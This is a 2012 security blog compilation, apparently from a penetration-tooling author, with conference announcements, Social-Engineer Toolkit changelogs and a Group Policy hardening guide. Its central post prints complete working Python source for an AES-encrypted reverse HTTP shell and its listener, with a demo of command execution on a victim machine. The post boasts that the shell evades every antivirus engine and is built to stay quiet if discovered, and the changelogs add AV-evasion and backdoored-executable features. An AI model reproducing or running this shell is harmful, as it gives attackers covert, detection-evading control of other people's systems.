We have been busy planning frantically and proud to announce BSIDES Cleveland! Just a couple items of interest, there will be a huge after party, lock pick village, and a couple of other huge announcements. Also an exciting thing, DerbyCon is a sponsor to BSIDES Cleveland! We love this community and any chance we get to sponsor something like this we hop right in.

Call for papers are now LIVE! It ends June 15th 2012.

Registration opens tomorrow at 8AM (May 15th 2012)

http://www.securitybsides.com/w/page/27427415/BSidesCleveland

Get them quick.. As you can imagine anything we plan it’s going to be biiiiiggg

Follow BSIDES Cleveland at: https://twitter.com/#!/BSidesCleveland

Conference Events:

Multiple Tracks
Lock Picking Tables
Giveaways / Prizes
Entertainment
After Party

Special thanks to the sponsors:

Diebold
Accuvant
DerbyCon
Rapid7
NEOISF
Hurricane Labs

Special thanks to:

Dave DeSimone and Kyle “Karl” Tomsik — without the help of these two individuals BSIDES Cleveland would not be possible.

DerbyCon tickets will go on sale for training and normal admission this Friday, April 27, 2012 at 1:00PM EST. General admission tickets will cost $150.00 each and training will be $1,000 each. This year is going to be AMAZING! Head over to http://www.derbycon.com for more information. Call for papers are also open! Check out the ISDPodcast THIS Friday at 1:00PM for a live special episode when ticket sales open. Taken from the DerbyCon website:

“We will be opening up ticket sales on Friday at 1:00PM EST on April 27th 2012. Both training and normal conference tickets will be going on sale at this time. We feel we have a very stable ticketing system at this point from the tests last week and don’t anticipate any major issues! We look forward to seeing everyone at DerbyCon this year… It’s going to be amazing!!!

Call for papers are also open! Check out the CFP section on the DerbyCon here.”

The Social-Engineer Toolkit version 3.2 codename “#FreeHugs” has been released. This has a number of additions including a new payload selection for a reverse HTTP shell built specifically for the toolkit. In addition there have been a number of additional Metasploit exploits added to the Metasploit Browser attacks and much more. A full changelog can be found here:

~~~~~~~~~~~~~~~~
version 3.2
~~~~~~~~~~~~~~~~

* added new payload to the HTTP attack vectors – the SET Reverse HTTP Shell which uses native AES encryption for tunneling commands back and forth
* added the new SET RevHTTP shell into the Java Applet attack vector
* added the Java AtomicReferenceArray Type Violation Vulnerability exploit to the Metasploit attack vectors
* added the Adobe Flash Player MP4 ‘cprt’ Overflow exploit to the Metasploit attack vectors
* added the MS12-004 midiOutPlayNextPolyEvent Heap Overflow exploit to the Metasploit attack vectors
* added an exceptions in for the Java AtomicReferenceArray to select java meterpreter versus standard since its specific to exploit
* reintroduced the set-web shell into the main repositories, still may be buggy — plan on rewriting soon
* added changes and obfuscation to the SET RevHTTP and changed the cipher key exchanges for the binary
* added a quit routine to the new SET RevHTTP shell — quit and exit work
* recompiled the SET RevShell to be nonconsole so it will not spit any input out even if its discovered
* removed slim_set.py it was no longer being used and no longer needed
* fixed an error that would be thrown when finished with an attacker vector then go to launch another attack it would throw an attack_vector not found exceptions (thanks Vinny Troia for the report)

As usual, with anything custom evades every anti-virus out there (0/43):

Here’s the shell in action on the victim machine:

C:\Documents and Settings\Administrator\Desktop>shell.exe

AES Encrypted Reverse HTTP Shell by:
        Dave Kennedy (ReL1K)

http://www.secmaniac.com

Usage: shell.exe reverse_ip_address port

C:\Documents and Settings\Administrator\Desktop>shell.exe 192.168.235.152 80

Here’s what we see on the attacker machine:

root@bt:~/Desktop# python server.py
############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
#        Dave Kennedy (ReL1K)
#     http://www.secmaniac.com
#
#
############################################
Starting encrypted web shell server, use Ctrl-C to stop

shell> 192.168.235.131 - - [07/Mar/2012 19:47:10] "GET / HTTP/1.1" 200 -
192.168.235.131 - - [07/Mar/2012 19:47:10] "POST /index.aspx HTTP/1.1" 200 -

shell> ipconfig
192.168.235.131 - - [07/Mar/2012 19:47:15] "GET / HTTP/1.1" 200 -
192.168.235.131 - - [07/Mar/2012 19:47:15] "POST /index.aspx HTTP/1.1" 200 -

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.235.131
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.235.2

Ethernet adapter Bluetooth Network Connection:

        Media State . . . . . . . . . . . : Media disconnected

shell>

As you can see, we have a full shell to the victim, at this point based on the code its trivial to implement upload/download commands and anything else we want from a purely stateful HTTP shell. When the commands are sent from the server, its encrypted leveraging AES and sent to the victim machine, its then decrypted and executed in a shell command. When the response is taken from the command shell option, its then encrypted back up and sent back to the listener. There is never a point in time where communications are sent via an unencrypted manner.

Here’s the source code for the encrypted shell:

#!/usr/bin/python
##########################################################################################################################
#
#
#  AES Encrypted Reverse HTTP Shell by:
#
#         Dave Kennedy (ReL1K)
#      http://www.secmaniac.com
#
##########################################################################################################################
#
##########################################################################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################

import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os
from Crypto.Cipher import AES

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length.  This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

# secret key, change this if you want to be unique
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"

# create a cipher object using the random secret
cipher = AES.new(secret)

# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"

# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
	auth_handler = urllib2.HTTPBasicAuthHandler()
	auth_handler.add_password(realm='RESTRICTED ACCESS',
                          	  uri=PROXY_URL, # PROXY SPECIFIED ABOVE
                              user=USERNAME, # USERNAME SPECIFIED ABOVE
                              passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
	opener = urllib2.build_opener(auth_handler)
	urllib2.install_opener(opener) 

try:
	# our reverse listener ip address
	address = sys.argv[1]
	# our reverse listener port address
	port = sys.argv[2]

# except that we didn't pass parameters
except IndexError:
        print " \nAES Encrypted Reverse HTTP Shell by:"
        print "        Dave Kennedy (ReL1K)"
        print "      http://www.secmaniac.com"
	print "Usage: shell.exe 
"
	sys.exit()

# loop forever
while 1:

	# open up our request handelr
	req = urllib2.Request('http://%s:%s' % (address,port))
	# grab our response which contains what command we want
	message = urllib2.urlopen(req)
	# base64 unencode
	message = base64.b64decode(message.read())
	# decrypt the communications
	message = DecodeAES(cipher, message)
	# quit out if we receive that command
	if message == "quit" or message == "exit":
                sys.exit()
	# issue the shell command we want
	proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
	# read out the data of stdout
	data = proc.stdout.read() + proc.stderr.read()
	# encrypt the data
	data = EncodeAES(cipher, data)
	# base64 encode the data
	data = base64.b64encode(data)
	# urlencode the data from stdout
	data = urllib.urlencode({'cmd': '%s'}) % (data)
	# who we want to connect back to with the shell
	h = httplib.HTTPConnection('%s:%s' % (address,port))
	# set our basic headers
	headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
	# actually post the data
	h.request('POST', '/index.aspx', data, headers)

Here’s the code for the listener:

#!/usr/bin/python
############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
#        Dave Kennedy (ReL1K)
#     http://www.secmaniac.com
#
#
############################################
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
import urlparse
import re
import os
import base64
from Crypto.Cipher import AES

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length.  This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

# 32 character secret key - change this if you want to be unique
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"

# create a cipher object using the random secret
cipher = AES.new(secret)

# url decode for postbacks
def htc(m):
    return chr(int(m.group(1),16))

# url decode
def urldecode(url):
    rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M)
    return rex.sub(htc,url)

class GetHandler(BaseHTTPRequestHandler):

	# handle get request
	def do_GET(self):		

		# this will be our shell command
		message = raw_input("shell> ")
		# send a 200 OK response
        	self.send_response(200)
		# end headers
        	self.end_headers()
		# encrypt the message
		message = EncodeAES(cipher, message)
		# base64 it
		message = base64.b64encode(message)
		# write our command shell param to victim
        	self.wfile.write(message)
		# return out
        	return

	# handle post request
	def do_POST(self):

	        # send a 200 OK response
        	self.send_response(200)
		# # end headers
        	self.end_headers()
		# grab the length of the POST data
                length = int(self.headers.getheader('content-length'))
		# read in the length of the POST data
                qs = self.rfile.read(length)
		# url decode
                url=urldecode(qs)
                # remove the parameter cmd
                url=url.replace("cmd=", "")
		# base64 decode
		message = base64.b64decode(url)
		# decrypt the string
		message = DecodeAES(cipher, message)
		# display the command back decrypted
		print message

if __name__ == '__main__':

	# bind to all interfaces
    	server = HTTPServer(('', 80), GetHandler)
	print """############################################
#
#
# AES Encrypted Reverse HTTP Listener by:
#
#        Dave Kennedy (ReL1K)
#     http://www.secmaniac.com
#
#
############################################"""
    	print 'Starting encrypted web shell server, use  to stop'
	# simple try block
	try:
		# serve and listen forever
	    	server.serve_forever()
	# handle keyboard interrupts
	except KeyboardInterrupt:
		print "[!] Exiting the encrypted webserver shell.. hack the gibson."

If you want to download the already compiled shell.exe and all of the source code click here to download.

You are on the inside network somehow and need to find what ports are allowed out to the Internet. There’s two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet facing computer thats running egress_listener.

Very simple to run:

On victim:

egressbuster.exe  
example: egressbuster.exe 208.1.1.1 1-1000

In the above example, we specify a low port range and high port range, egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is.

The listener:

python egress_listener.py 
example: python egress_listener.py 1-1000

In the above example, we just specify what ranges we need to listen to. In the above example we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side.

192.168.235.131 connected on port: 170
192.168.235.131 connected on port: 171
192.168.235.131 connected on port: 172
192.168.235.131 connected on port: 173
192.168.235.131 connected on port: 174
192.168.235.131 connected on port: 175
192.168.235.131 connected on port: 176
192.168.235.131 connected on port: 177
192.168.235.131 connected on port: 178

If your interested, download the byte compiled code and the python source here.

Artillery 0.4 has been released, this version adds cidr notation whitelisting capabilities as well as bug fixes and additional enhancements. Enjoy.

Changelog:

~~~~~~~~~~~~~~~~~~~~~~
version 0.4 alpha
~~~~~~~~~~~~~~~~~~~~~~

* added ability to use cidr notations in the artillery config so you can do something like 127.0.0.1,localhost,192.168.235.1/24,etc.
* code cleanup and commenting on multiple directories
* added a number of new core modules, most specifically cidr notation support
* changed install.py to be setup.py
* moved root README to readme/ and deleted the old one
* added better detection around restart_server.py if artillery was there
* cleaned up some old threading syntax issues

You heard it right. SET 3.1 has been released. I decided to go crazy on another development binge. This release has a number of bug fixes and re-introduces the set-web GUI. This release also has some major performance boosts and some new options. SET is under a bit of a rehaul when it comes to the centralization of information and how it reports between each other. This version kicks that off with much more to come.

Full changelog below:

~~~~~~~~~~~~~~~~
version 3.1
~~~~~~~~~~~~~~~~

* added better error handling within harvester.py – should fix a transmission error bug when users close the browser half way through
* licensing has been changed to reflect 2012 and the new hug licensing agreement will prompt now the next time you launch set
* fixed a bug if you were using self signed java applets, it would throw an error that signapplet was already used – added randomized string values to it
* did some code cleanup on harvester and removed old code
* changed self_sign.py to import from setcore libraries
* fixed a bug that when importing own custom executable into SET would throw an exception due to shutil.copyfile not properly defining file name
* added a break within the custom import exe to trigger a while 1 loop to not terminate web server thread – control-c exits when finished with java applet attack
* rehauled the set-web interface and is now back to being supported and included into the main libraries
* fixed a spacing issue when selecting the spear phishing menu between the last two exploits
* added Adobe U3 exploit to the phishing site for set-web
* added the Rhino Java Exploit to the webattack site for set-web
* rehauled most modules to change from src.core import setcore to from src.core.setcore import *
* fixed a bug that if you were using web templates and select SE Toolkit payload it would error out
* fixed a bug that caused the listener.py to not be found when using web templates
* added a new check routine for set.options which will be the central store for all set related options versus different files
* added the new check routine into spawn.py to check for custom executables, will start converting everything in next release

Greetings all. I’m excited to release the 3.0 version of the Social-Engineer Toolkit (SET) Codename “#WeThrowBaseballs”. This release has been one of the most challenging ones thus far with the largest changelog, code rehaul, and features. I’ve literally been working on this for a solid three months. Please note that this is a major rehaul on the existing codebase, there are bound to be bugs. Please report bugs to davek [at] secmaniac.com. There’s really way to much to cover on whats changed but here are a couple of major highlights (also check out the video!). It’s truly humbling and inspiring to see how far SET has gone as being a tool used by virtually every penetration tester and security-minded folks. Could have never envisioned what it’s turned into and can’t thank everyone enough for the support.

If you support SET, please vote for us on SecTools! http://sectools.org/tool/socialengineeringtoolkit/

1. Support for Windows – Tested on XP, Windows 7, and Windows Vista. Note that the Metasploit-based payloads to not work yet – when SET detects Windows they will not be shown only RATTE and SET Shell
2. New attack vector added – QRCode Attack – Generates QRCodes that you can direct to SET and perform attacks like the credential harvester and Java Applet attacks
3. Improved A/V avoidance on the SETShell and better performance. I’ve also fixed the non-encrypted communications when AES was not installed
4. Added a number of improvements and enhancements to all aspects of SET including major rehauls of the coding population and moved from things like subprocess.Popen(“mv etc.”) to shutil.copyfile(“etc”)
5. Rehauled SET Interactive Shell and RATTE to support Windows
6. New Metasploit exploits added to SET

Those are the main highlights. Check out the video below:

Full changelog below:

~~~~~~~~~~~~~~~~
version 3.0
~~~~~~~~~~~~~~~~

* added the Adobe U3D memory corruption exploit from Metasploit to SET
* added new core library check_os for smart OS detection
* bug fix in Phishing using the smtp_client module (Thanks for the patch Stephen Haywood)
* rehauled set launcher to be windows compliant
* rehauled set-proxy to be windows compliant
* rehauled setup.py to be windows compliant
* rehauled setcore to be windows compliant
* added a new directory called thirdparty, this will dynamically import modules that are required versus having to install, if that fails you will have to manually download and install the depends
* removed the subprocess.Popen depends on src/core/set.py, this is no longer needed and covered to os.remove, os.makedirs, and shutil.copyfile instead
* Completely rehauled src/html/web_server.py to where it is no longer needed using pexpect. The goal is to move all depends to not require pexepct as it is not supported in Windows. All code now resides in src/html/spawn.py and is multi threading and background threaded
* spawn.py uses multi-threaded webserver and rehauled to be windows compliant. pexpect is no longer used for windows systems as it is not supported, had to move to os.system for now, importing the module with thread locks caused lockup issues
* rehauled listener.py to be compatible with windows
* fixed a bug that would cause pexpect to not be found if selecting SET interactive shell (no longer needed)
* rehauled src/webattack/web_clone/cloner.py to be windows compliant and now supports java applet attack rewrite for wgeting websites
* changed set executable to cleanup program_junk but skip .svn which would cause conflicts, this works on both windows and nix based systems
* fixed a bug on credential harvester if it wasn’t installed it should except via ImportError versus IndexError. this was changed to ImportError and allow normal execution while disabling SSL support
* rehauled src/webattack/harvester/scraper.py to be windows compliant
* rehauled src/webattack/harvester/harvester.py to be windows compliant
* added the ability to keep execution flow of the backdoored executable (thanks pure_hate), this is now configurable through the config/set_config but disabled by default
* added a new option in config/set_config to allow customized user-agent strings when doing web_cloning..some websites only support certain browser versions, this will allow you to change to whatever browser ou want
* changed the user agent string from mozilla firefox 3.6 to be Windows 7 IE 8, more compatibility with websites: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
* removed the ability to be able to use spear phishing or wireless attack vectors on Windows for now
* converted src/webattack/web_clone/cloner.py to be the standard import for setcore, it was from src.core import setcore as core, changed to from src.core.setcore import *
* bug fix when launching java applet attack and metasploit in 3.0 would cause the listener to not spawn properly
* bug fix when selecting the SET interactive shell it would not copy the proper executable to pack/obfuscate
* bug fix that would cause the last exploit in spear phishing to not show a number
* changed some output on wget to use -O instead of standard moves to filenames, much cleaner
* major bug fix on how the listener and SET interactive shell handled non-encrypted communications
* added proper encryption/decryption routines to interactive shell and set listener
* added the ability to leverage partial encryption/decryption of communications to interactive shell and listener
* fixed a bug that would cause the shell to not work properly due to an invalid content length when parsing through payload
* fixed a bug that would prompt for port on SET interactive shell even after it was specified
* rewrote fasttrack mssql attack vector to be windows compliant – had to switch off pexpect and move to os.system with unthreaded http server modules
* added verbose messaging to attack vectors that are not yet supported for SET
* rehauled multiattack to support windows-based attacks – it also now prompts if invalid payloads are selected
* fixed a bug that when selecting menu 99 within multiattack, would say invalid selection. it now properly exits
* increased the response time for using the SET interactive shell, it now loads much quicker
* added a new config option to either use a staged downloader or download the SET interactive shell directory, this new feature is best for A/V detection but might be a little slower on what the user experiences. All of my testing shows that it doesn’t however I’m also not testing over the Internet. The main problem is the staged downloader does a download/exec which would get flagged by AV. The SET interactive shell on the other hand is a wrapped python interpreter so its much harder to detect and flag with signatures. This new config option can be turned on to support staged configs if you aren’t worried about A/V.
* added new options within payloadprep.py (SET Interactive Shell prep) to detect the new config change options and flag the SE Interactive Shell as the main staged downloader
* rewrote the Java Applet attack including the jar file to incorporate the straight staged downloader
* added a new attack vector that I’ve been promising for several months called the QRCode Generator Attack Vector.. Create a QRCode with a URL then create a SET attack vector to assist with the attack
* added new set menus to setcore so when you launch set theres some new ascii art… yea i got a little bored
* fixed a bug that would cause the new stager option to not work within the Fast-Track MSSQL bruter menu
* added a check to see if metasploit path was found, if not it will limit payloads only to SE Toolkit ones
* added better handling around metasploit path detection and trigger error message when msf path is not set
* added checking in set.py to detect attack vectors that require metasploit
* added a new cleanup routine that circles through directories cleaning up remenants of things saved out during normal operation
* rewrote portions of teensy payloads to support windows
* fixed a bug that would cause the menu to not load properly randomly (randrang was from 1 to 8 versus 2 to
* added permission change to executable on ratteserver so that it will always function normally if execute flag is removed
* fixed a path issue with RATTEServer that would cause it to not properly load and flag an issue
* converted RATTEServer to os.system versus pexpect child.spawn – easily more portable and less reliability on third party module
* added RATTEServer for Windows (Cygwin mod) to support Windows operating system
* added RATTEServer to payload selection list to now be supported via windows operating systems
* added RATTEServer to payloadprep and spawn.py to deploy RATTEServer based on operating system i.e. windows/posix
* added the ability to import custom binaries into windows versus linux only mode
* fixed a bug in RATTEServer that would flag an error when spawning RATTE on Windows
* added a chmod +x routine per each run of set instance if posix is detected.. will make it easier if certain permissions aren’t set properly
* added the ability to natively copy ratteserver.binary and cygwin to program_junk to be run
* added payloadprep detailed error logging to the default log file being generated by SET
* rehauled java applet to add additional features and re-compiled and signed
* rewrote portions of shellcodeexec for better a/v avoidance

Greetings all! Have some great news. I’ll be teaching a course at Blackhat on the Social-Engineer Toolkit (SET). The course is designed to teach you everything you ever needed to know about SET and how to effectively use it during a penetration test. You’ll even get a free signed book of Metasploit: The Penetration Testers Guide

For more information or to register, head over to here: http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html. You’ll also get a free Teensy device that we’ll be programming during the class! If you are a penetration tester, or wanting to get into it.. This is your course. Learn how to write your own modules, customize your own attacks, build your attack off your company and have a high level of success.

Course description:

OVERVIEW:

The Social-Engineer Toolkit is an open-source standard for penetration testers to test the effectiveness of their overall education and awareness programs. SET is designed to couple sophisticated and targeted attacks and leverage the human element to make an extremely large attack. SET has been featured on BBC, the History channel, and a number of other media outlets and used by penetration testers across the world. This course will cover how to leverage sophisticated attack vectors using the social-engineer toolkit and how to customize it during a penetration test.

SOME ADDITIONAL INFORMATION:

Here’s SET on the History channel: http://vimeo.com/34539161
Talk I did that has some portions of SET at Defcon 19: http://vimeo.com/29282237
DerbyCon talk with Kevin Mitnick includes SET: http://vimeo.com/31663242

WHO SHOULD ATTEND:

Penetration testers, security enthusiasts, IT personnel Student Requirements, experience/expertise: Those with basic experience of Linux and penetration testing

WHAT TO BRING:

Students must have a virtual machine or computer with the latest BackTrack Linux distribution. Students must also have a Windows XP or Windows 7 machine which can be fully patched to perform the social-engineering attacks on.

MATERIALS SUPPLIED:

A copy of the book Metasploit: The Penetration Testers Guide
A free Teensy device used to perform social-engineering attacks

Look forward to seeing everyone there, giving free hugs, and dumping my brain on you! Register here!!

One of the common techniques I generally use during a penetration test is often referred to as pivoting or leap frogging. Essentially, when you compromise one machine, the information on the single server often yields a second or multiple compromises on an infrastructure. For example, say I compromise a member DC within a domain and dump the SAM database. The local administrator account hashes are extracted and can be used on almost any server within the domain at that point. Other common techniques revolve around token/kerberos impersonation and leveraging other techniques for gaining access to other systems. I decided that we no longer needed the local administrator accounts on any of our systems and wanted to go ahead and disable that. There is a group policy setting to change the local administrator account name as well as disable it. This works like a champ on Server 2003 however does not on 2008. A new requirement on server 2008 has to have a second administrator account active on the machine in order for the default account to be disabled. This completely defeats the purpose of what we’re trying to accomplish here. Luckily theres a somewhat less known way of disabling it across every machine through group policy.

Before starting any of these steps, ensure that you force a name change on the administrator account through group policy. If it’s specified as Non Defined, then the administrator account can be renamed to something else and this scheduled task method will not work. In our example, we renamed the local administrator to “notused”

First, log into your domain controller and go to the group policy management editor. Edit whatever group policy governs your workstations and servers or both. Right click edit and navigate to:

Computer Configuration, Control Panel Settings, Scheduled Tasks

Right click on the scheduled task window and select new scheduled task.

You should get something that looks something like this:

Ensure that “run as” is not checked in order to run as the local SYSTEM account. Fill out the information shown here:

Click on the schedule tab. On the schedule tab, keep the defaults and click advanced. Place the amount of minutes you want it to be active. 10 minutes seemed fine to us.

After that, click OK and OK. Go onto a machine and run a gpupdate /force. The local administrator account should now be disabled and work on server 2003, Windows 7, Vista, server 2008, etc.